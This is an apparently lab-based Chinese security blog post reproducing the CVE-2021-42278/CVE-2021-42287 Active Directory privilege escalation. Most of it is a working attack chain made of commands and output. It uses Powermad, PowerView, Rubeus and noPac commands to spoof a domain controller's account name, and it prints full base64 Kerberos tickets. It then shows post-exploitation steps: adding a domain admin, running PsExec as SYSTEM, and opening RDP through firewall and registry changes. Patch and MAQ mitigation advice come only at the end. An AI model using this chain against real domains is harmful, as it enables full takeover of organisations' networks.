CVE-2021-42287/CVE-2021-42278 域内提权
CVE-2021-42287/CVE-2021-42278 域内提权
星期五实验室
阅读须知
星期五实验室的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息造成的直接或间接后果和损失,均由使用者本人负责。
星期五实验室拥有对此文章的修改、删除和解释权限,如转载或传播此文章,需保证文章的完整性,未经授权,不得用于其他。
01
背景及影响范围
背景
2021 年 11 月 9 日,国外研究员在推特上发布了 Active Directory 相关的 CVE,CVE-2021-42278 & CVE-2021-42287 ,两个漏洞组合可导致域内普通用户权限提升至域管权限。
影响范围
CVE-2021-42287:
Windows Server 2012 R2 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 (Server Core installation)
Windows Server 2008 R2 for x64-based Systems Service Pack 1(Server Core installation)
Windows Server 2012
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 for x64-based Systems Service Pack 2(Server Core installation)
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2(Server Core installation)
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2016 (Server Core installation)
Windows Server 2016
Windows Server, version 20H2 (Server Core Installation)
Windows Server, version 2004 (Server Core installation)
Windows Server 2022 (Server Core installation)
Windows Server 2022
Windows Server 2019 (Server Core installation)
Windows Server 2019
CVE-2021-42278:
Windows Server 2012 R2
Windows Server 2012 (Server Core installation)
Windows Server 2012
Windows Server 2008 R2 for x64-based Systems Service Pack 1(Server Core installation)
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 for x64-based Systems Service Pack 2(Server Core installation)
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2(Server Core installation)
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2016 (Server Core installation)
Windows Server 2016
Windows Server, version 20H2 (Server Core Installation)
Windows Server, version 2004 (Server Core installation)
Windows Server 2022 (Server Core installation)
Windows Server 2019 (Server Core installation)
Windows Server 2022
Windows Server 2019
Windows Server 2012 R2 (Server Core installation)
02
漏洞介绍
- CVE-2021-42278,机器账户的名字一般来说应该以$结尾,但AD没有对域内机器账户名做验证。
- CVE-2021-42287,配合 CVE-2021-42278 使用,创建与域控机器账户名字相同的机器账户(不以$结尾),账户请求一个TGT后,更名账户,然后通过S4U2self 申请TGS Ticket,接着域控在 TGS_REP 阶段,这个账户不存在的时候,DC会使用自己的密钥加密 TGS Ticket ,提供一个属于该账户的 PAC,然后我们就得到了一个高权限ST。
03
测试环境信息
域控win2016:
- 域名:vulntarget.com
- 账号:administrator
- 密码:admin@123
- 计算机名:WIN-UH20PRD3EAO //系统自带的,没改过
域成员win10:
- 账号:vulntarget.com\win101
- 密码:admin#123
04
复现测试
本次用两种方式进行复现,分别是一步步请求获取票据和使用工具直接两步到位。
一步步请求获取票据
利用 powermad.ps1 新增机器帐号
下载地址:
https://github.com/Kevin-Robertson/Powermad
Import-Module .\Powermad.ps1
New-MachineAccount -MachineAccount eval -Domain vulntarget.com -DomainController WIN-UH20PRD3EAO.vulntarget.com -Verbose拿下域成员之后,很好定位到域控,得到域主机名,msf直接运行:run post/windows/gather/enum_domain
需要修改下策略
以管理员打开powershell(使用本地管理员就行,cmd管理员打开,uac验证的时候,使用本地管理员的账密,将域那个位置改为本地的机器名),运行参考:https://www.jianshu.com/p/a0a88d3bb787
Set-ExecutionPolicy RemoteSigned执行之后,选择Y就好。
添加用户eval,设置一个密码:admin123
New-MachineAccount -MachineAccount eval -Domain vulntarget.com -DomainController WIN-UH20PRD3EAO.vulntarget.com -Verbose
清除SPN信息
Set-DomainObject "CN=eval,CN=Computers,DC=vulntarget,DC=com" -Clear 'serviceprincipalname' -Verbose使用Set-DomainObject需要加载模块:powerview模块,下载地址:
https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1,直接右键保存,后缀为ps1就行。
重设机器名称
Set-MachineAccountAttribute -MachineAccount eval -Value "WIN-UH20PRD3EAO" -Attribute samaccountname -Verbose
//重设的机器名称上面定位域控的时候就查询到了,为WIN-UH20PRD3EAO,eval为刚才新建的用户
请求TGT
.\Rubeus.exe asktgt /user:WIN-UH20PRD3EAO /password:admin123 /domain:vulntarget.com /dc:WIN-UH20PRD3EAO.vulntarget.com /nowrap
//password为刚才新建机器账号时的密码
修改机器的samaccountname值
将值修改回到原来的属性
Set-MachineAccountAttribute -MachineAccount eval -Value "eval" -Attribute samaccountname -Verbose
获取票据
利用刚刚申请的TGT进行S4U2self,模拟域内的域管去请求域控DC的ST票据,最终获得域控制器DC的权限。
.\Rubeus.exe s4u /impersonateuser:Administrator /nowrap /dc:WIN-UH20PRD3EAO.vulntarget.com /self /altservice:LDAP/WIN-UH20PRD3EAO.vulntarget.com /ptt /ticket:doIFXDCCBVigAwIBBaEDAgEWooIEZDCCBGBhggRcMIIEWKADAgEFoRAbDlZVTE5UQVJHRVQuQ09NoiMwIaADAgECoRowGBsGa3JidGd0Gw52dWxudGFyZ2V0LmNvbaOCBBgwggQUoAMCARKhAwIBAqKCBAYEggQCiSaN7Tiezy9leFd3mpA1+1uTIIdouVoccMl3Qp+90weQdXBMJldg4t9a8F5Up/skzAg08Px74Jubld1YyT+qK0yv3/7YnFvZryleWV3VWJhn4DXwiwf2IUb28V8EDouuY7Z9s6nlm9GPVI03fHbZUuMMNzP6Nc5Pxk+6jm2NjgjdgX0ww5w41WvF1bluI2OOb8OVmYByP5a32dLDin9rLyglgw+NA8B1fhyuaHAZtHhXXKTY5EQfJ2eJc0mgAm8xk0XsGOeAKh/4LlRER5R5Rg19UKdh7lkx15M2IodyWHoEIvNdAtw2LteopcnckMduER+R6zY7Uloef1gg3B4iTMJmt9+BEIcXLITUVLqCjLFN/5Iugkf0LZoWNMfhlEZzlTcnORUHE4mBzsM8K01b0pFairByE66wwFaZhe4yh3Kvb8qcsYXeuY0D4gxqm+9pmfXXrKw5z1vzF1Ff2MCg4p2cuTU0tiyxUow7yY6T5Ae0f6siBoPi+SSnBKSPTu9wOvziCD5Cq2fxiMMMPoLY0x0mZSVf6tci11gUTLw2k0y4Yvtsd86zWnS2xpNPl8zDk42RWg+eKdiUARXIUu7WYWogbavl9/NGt+YcfttCWHX7vPRlZVhpppMYSAqJWQDHb8vAsPkMzID/tqmJO/FTt1kraKVQY2KACacDkrN/o5asNxLq5tKHkouH6qnHx3xY6hABONBV2c7l0HQ9BxNTkzVdGOVf6tQKfFoMZKdSSpWr4Pn9baR5NllqYr+FMDalfkhBOWkKhxOkcunbD8ABfJn6Rc2GQwpVDg3u5z7ndnt8vQhP5sYcXSz8XpjdU53Ddq89Kf1gwlKwR3zjusQfBM7u0EzPoz8Rxq1SqDar9HWooBfOOk5GJ5n93vjT76vlfQ9aLGnyTfBfJAOMcPFzXEt9xUrORPGdm93IR38f4m0WmU2jpIZJhbxmz8hDvEcQf+26PUaP7iZEZ5c492PfXKfl6zvkjPx0/iTdiTWl+uFuyrhB/f1WuQOyNzcs41ePprqLypenIjlmeo1ugJQM6B1F1NrnvO43bpmhjq+tSkAbGYumhDchDQQB4ezju2LPh+iK8COub04hguE06vCT2uiIi0ZGA+mmrAdAxRxTal4Aup4QZc8E5dmDwVD3KbzAkkbhtfXI7ZtUcb/T6EZRV56if1nlDp11c5x3OjwJwpKbvUL5Q1joJ1gMzQf/Mg2SkEMs4ShPxOpwrRdkhzhj+whhzi8O6QtG4gWiyT4nwlbirkZ7mY6eCiorRCXF4cPV1uBwWAHdKl4ckWIsI4C+tppNIByRH0nXbszoOnY4s5Xo5+Mmlj6sx9ff8I9sLULiT/G0ih6cupNbQLF3ms7jr6w+o4HjMIHgoAMCAQCigdgEgdV9gdIwgc+ggcwwgckwgcagGzAZoAMCARehEgQQ1nRhtTe/YZYYjku02ZLU0qEQGw5WVUxOVEFSR0VULkNPTaIcMBqgAwIBAaETMBEbD1dJTi1VSDIwUFJEM0VBT6MHAwUAQOEAAKURGA8yMDIxMTIxMzEzMTUzOFqmERgPMjAyMTEyMTMyMzE1MzhapxEYDzIwMjExMjIwMTMxNTM4WqgQGw5WVUxOVEFSR0VULkNPTakjMCGgAwIBAqEaMBgbBmtyYnRndBsOdnVsbnRhcmdldC5jb20=
查询票据
但是发现访问不到域控,查看了下,对比nopac的payload,nopac使用的cifs服务,而这里使用的是ldap服务,将这里的ldap服务改为cifs服务即可:/altservice:LDAP,修改为:/altservice:cifs
原本:>.\Rubeus.exe s4u /impersonateuser:Administrator /nowrap /dc:WIN-UH20PRD3EAO.vulntarget.com /self /altservice:LDAP/WIN-UH20PRD3EAO.vulntarget.com /ptt /ticket:[base64 tgt]
该服务即可:.\Rubeus.exe s4u /impersonateuser:Administrator /nowrap /dc:WIN-UH20PRD3EAO.vulntarget.com /self /altservice:cifs/WIN-UH20PRD3EAO.vulntarget.com /ptt /ticket:[base64 tgt]
修改后
.\Rubeus.exe s4u /impersonateuser:Administrator /nowrap /dc:WIN-UH20PRD3EAO.vulntarget.com /self /altservice:cifs/WIN-UH20PRD3EAO.vulntarget.com /ptt /ticket:doIFXDCCBVigAwIBBaEDAgEWooIEZDCCBGBhggRcMIIEWKADAgEFoRAbDlZVTE5UQVJHRVQuQ09NoiMwIaADAgECoRowGBsGa3JidGd0Gw52dWxudGFyZ2V0LmNvbaOCBBgwggQUoAMCARKhAwIBAqKCBAYEggQC6ha0sLmV5NFrig66k/5WB8xTFCVCHPMF1CVS7aalY5GCCUGLkPNb4W7g+lsijGS6T7hCNufoU/tMzrzmRpsihme5aK2mnZuqoEuMlAEzVpbFZR00CzZ7tG6zwobx7aE5XFecfwXjJBgh5ZE3lgNDB7QFRA/uJUuCfdmQsFytbXlJiNPee/ycuXG/Y6J908R33GQ6WB7sboht4zmgiHwWh38ZwXGLP9tGwg0psK0Jr9f2yU6s5wTiKvky5ABQLJClj+RNC/HlGTl+F7HLZek1uNw52DaIM4ghgF3FOHokiM66cPKVArKlVSmvUEtCncno1xLFhgcxZlOd6F+N7T1anVmO4gAxghftRaqrAzCgpg42w7jyWiJbht9740XG01fuMttkvrq1EiJtmGvSAHVx3oSf0jqlkjwLexZbtTu+8nY++WI195ZmiD4B4PsxubBIQWu6sa43T0v16NRg40P6nEe3Arh1hDZc6XPuCG19FOnTyPTJgCu8T4Df1Tr6oO8j07rYLuk2ozBeH/u3upyOOd0GRuSY3U8pqBNsZVrHfdPRCGvEVzK8zuEfKKN19EIdZVZL3WGAMFFQHxU700peSbmke68GpmuCzq5+3S0rE2lC1jSnXDIONQicgjX4Xbq65P9abNXymEsCu7i7NrU2O1jUaJemqUMod8cDuvd3ZeX+FooeeX/N+KZeuZaw24jTN46w7C4F2EWUX4eO1pkMocw31Hj6+OGXZfzLmf92PphIrEMz0+l8TdHkZ6cTZkx0FXo4bhcNh/4vLFQ9+LRprqT/Sk2auOqcDYAJIWQD4Fy5dhd8QlmUybwseWohk8y7GhGWalkKN7feVrs9OuZZO1V7xbK30AY2UR87R7hiDz7MQ/hQ0CWZLl15vuxSKbrG0gvMOxrGO4Za6Dfz1VoPS+kjV/oUueZVXwRCVgYf0t9PrLmlZ66PHwX2q20hvv42pg694Rgl6g8XdS0SiEf+yntjZ51Z8KXMlIA8Rk0o2aT6/b6nF4/jF7Mq/s4+VKwitPOksvvMF9zhscDbcqC31xwuEHb0H3DJaiKsMbxOea+8FztGvC48yjphC5VzLPvGrJqtlPmrCNKPZhV2TQqRi1uC0gJZ92nBbVnLGKHO058fd2XqZ3zHyr9YJTXzY7Q4k31LxbBF5H999noEyyTs3fkyJ5Uvihb71s1PJ3ZO14EWa55mYrH94gxL1HCl4YvCqCo2VXNAjU49XvylpeqCmReRLV3JMTOuemh/yQT0bKlC8Ou5cSMIXe+WX7y6IoHyKZGWTYGqe/6Ctfsw2LTGSw2iZuAD2EmuoibbQ3bIcEyJCalr/k0Yr0vbrPYW/vltzOd0UE76MtTLplBcd1Cy27rgo4HjMIHgoAMCAQCigdgEgdV9gdIwgc+ggcwwgckwgcagGzAZoAMCARehEgQQ24AjfZb2ZKzSNXPxMye416EQGw5WVUxOVEFSR0VULkNPTaIcMBqgAwIBAaETMBEbD1dJTi1VSDIwUFJEM0VBT6MHAwUAQOEAAKURGA8yMDIxMTIxMzE0MjExNFqmERgPMjAyMTEyMTQwMDIxMTRapxEYDzIwMjExMjIwMTQyMTE0WqgQGw5WVUxOVEFSR0VULkNPTakjMCGgAwIBAqEaMBgbBmtyYnRndBsOdnVsbnRhcmdldC5jb20=
自动化
利用脚本地址:
https://github.com/cube0x0/noPac,需要自己编译为exe文件。
运行noPac.exe需要.net环境,下载地址:https://www.microsoft.com/zh-cn/download/confirmation.aspx?id=17718
执行命令,查看是否存在漏洞,顺便可以拿到域控的机器账号,看到这里的票据大小为537,有师傅提醒说如果票据大于1000,就是添加了PAC,没有这个漏洞了。
.\noPac.exe scan -domain vulntarget.com -user win101 -pass admin#123 //账号密码为域成员win10的
可以看到是存在漏洞,能拿到票据。执行一下命令传递票据。
.\noPac.exe -domain vulntarget.com -user win101 -pass admin#123 /dc WIN-UH20PRD3EAO.vulntarget.com /mAccount test /mPassword QWEasd123 /service cifs /ptt
//这里会增加一个密码为admin@123的机器账号test
C:\Users\win101\Desktop\Powermad-master>.\noPac.exe -domain vulntarget.com -user win101 -pass admin#123 /dc WIN-UH20PRD3EAO.vulntarget.com /mAccount test /mPassword QWEasd123 /service cifs /ptt
[+] Distinguished Name = CN=test,CN=Computers,DC=vulntarget,DC=com
[+] Machine account test added
[+] Machine account test attribute serviceprincipalname cleared
[+] Machine account test attribute samaccountname updated
[+] Got TGT for WIN-UH20PRD3EAO.vulntarget.com
[+] Machine account test attribute samaccountname updated
[*] Action: S4U
[*] Using domain controller: WIN-UH20PRD3EAO.vulntarget.com (10.0.10.100)
[*] Building S4U2self request for: 'WIN-UH20PRD3EAO@VULNTARGET.COM'
[*] Sending S4U2self request
[+] S4U2self success!
[*] Substituting alternative service name 'cifs/WIN-UH20PRD3EAO.vulntarget.com'
[*] Got a TGS for 'administrator' to 'cifs@VULNTARGET.COM'
[*] base64(ticket.kirbi):
doIFzDCCBcigAwIBBaEDAgEWooIEuDCCBLRhggSwMIIErKADAgEFoRAbDlZVTE5UQVJHRVQuQ09NojEwL6ADAgEBoSgwJhsEY2lmcxseV0lOLVVIMjBQUkQzRUFPLnZ1bG50YXJnZXQuY29to4IEXjCCBFqgAwIBEqEDAgEDooIETASCBEirOVpwF2mskeBncTRkD5gQcgRUTZyU/OsEvtM7iT9ZOsJqBpkHZGvLILAvVCTiPcQ2SFaJxwWrvYzpNBNwrdriWoIOcSmbLc5DPSCvoLTkUIUZJWAX8czSuoleU/3dZ5gJpHUYKjPa/MEW/KWlr2hHE7IjgskiOrPy89MpIVQAI/iH1BvnoaVxEP6LNmQvrQXO9DOFvQigt3qh87Pc+n6bJ7HBBW6PTQiXTLlwDPLbJfuRU8UqTiUIpuS/hhT9nNTtzOF8Mb1SuXpYG97igldulsWHWlSs6gpFFe5wKtpGHluKUHWBOoQe4lZo/EgCmEGZfO/YNfIfiE7+fyLHMNfkecaDboKFi/6UKKihV5eTCwYAiaoDWuwBxMCOC1VbptozpyiSvFmwjtkYakK6DQKWdOSb4Ia2AXp3OEfTvcfq9cWQavNAOFMNR6txisCUko4+PCofEu9sL26w6vdqPnYLfie1aMLs/DWjavuWe6/8j2EcwX6vgvJYVXgSXQibnhVDbn7mf+4Tfaa4ht096fKX54j5ja9CjaElRuCogqW3TUeDSYUpjvMcpDPax0cLR/99/uZnx+s9BLda+jQX4lh3OmxtmUW8CjZS6Sv3XQW/CyhzD4B2RFPXk3Ya7j56F3Wikeq6yW9AHF2EuD+9fNpMhg2nydv9vtt19mAj2BfljXKWJz4EXnbT+sYEapcwchvufHQu6a2n/+iq2G9tjSkH6Z2Vnn8Ui+gJeTm2im+pVBntKR0CpnEAKlCtD3G5/RlqkZchY2zBPebMiyqx0mtBWqMMaTS3p0D//FLvX1oo3g80zShCelw4y+J3Z8MGZdUFw21Mckz9eIk5jt0VcX4h5snC/OlrMN7+yJAUl1tqC/O8tp4q2J9Jbqz+W5idJjNj1EGvnJ6kZ6owo/87qigObGchJKLZkS4wAuSe3kSh0PyirIBowjKJMVKtTg5ruW6y6cS+SGRLk5PRS7b9apSUKdH26XvXCLepH4s9Aje+fmLCPwzwVGp2+ErWeBOy6Pyi7malGE601/eg0M5XuaTc7EahgQuHY8KIZ8RBFJRrkMiULiBNctewgdm1bzRol0/GqtZT+5aH27klcGfLx3D8yUCylkl2o7sJVUwcNo6fYwtfElvm5JM9EiujfzDgkUTjSCSBrR9f/BihHNqYFVUfvhQDBAsL/6Lmo7nlMQN++Gq/oPukS5o6m/nykNwhbF178gtSE45jGKiGgBzvSFIkqI6I4JGxKJmpzk6UgoVL1BxguCkbgO/dlRhqvbjdSw5PrOph5KsiWkxwYuCvhCVs4EU23zvm0jrzhAsJwmQVVry9vhZLBRzagWSWEPD1g9vzIJoV/aO4GXgtcN/bbCfnodZ39SKosTinJ7E+tQpHipy+l54flXZHI9hapjpG5l7IvBScOARggTVaAV9L8fbvWyQJTjN8OgmF1L1DVQQnu03HBmCjqTIdo4H/MIH8oAMCAQCigfQEgfF9ge4wgeuggegwgeUwgeKgKzApoAMCARKhIgQg6IvCqN83Pz8hva8aEtoE655mm+mQdTAURKY5uKitJMGhEBsOVlVMTlRBUkdFVC5DT02iGjAYoAMCAQqhETAPGw1hZG1pbmlzdHJhdG9yowcDBQAApQAApREYDzIwMjExMjE0MDEyNjA2WqYRGA8yMDIxMTIxNDExMjYwNlqnERgPMjAyMTEyMjEwMTI2MDZaqBAbDlZVTE5UQVJHRVQuQ09NqTEwL6ADAgEBoSgwJhsEY2lmcxseV0lOLVVIMjBQUkQzRUFPLnZ1bG50YXJnZXQuY29t
[+] Ticket successfully imported!在域控上会多一个机器账号test
添加域管账号
net user admin QWEasd@123 /add /domain
net group "Domain Admins" admin /add /domain
查看域管账号是否添加成功
net group "domain admins" /domain
有了域控账密,可以使用PsExec64.exe来对域控进行下一步的操作,开3389之类的。
PsExec64.exe -u vulntarget\admin -i -p QWEasd@123 -s cmd.exe //本地使用域控的cmd,-s使用system权限来运行,不然会被拒绝,执行不了一些命令
这里域控还没有开启3389。
尝试开启域控3389,修改防火墙策略。
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow开启远程:
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
使用新建的域控账密登录试试:
账号:admin
密码:QWEasd@123
远程成功。
其他利用方式,自行操作。
05
修复建议
- 微软官方已推出补丁:KB5008602、KB5008380,或者更新windows系统
- 通过域控的 ADSI 编辑器工具将 AD 域的 MAQ 配置为 0,中断此漏洞的利用链。
参考链接:
https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.htmlFRIDAY LAB
星期五实验室成立于2017年,汇集众多技术研究人员,在工业互联网安全前瞻技术研究方向上不断进取。星期五实验室由海内外知名高校的学院精英及来自于顶尖企业的行业专家组成,且大部分人员来自国际领先、国内知名的黑客战队——浙大AAA战队。作为木链科技专业的技术研发团队,星期五实验室凭借精湛的专业技术水平,为产品研发提供新思路、为行业技术革新探索新方向。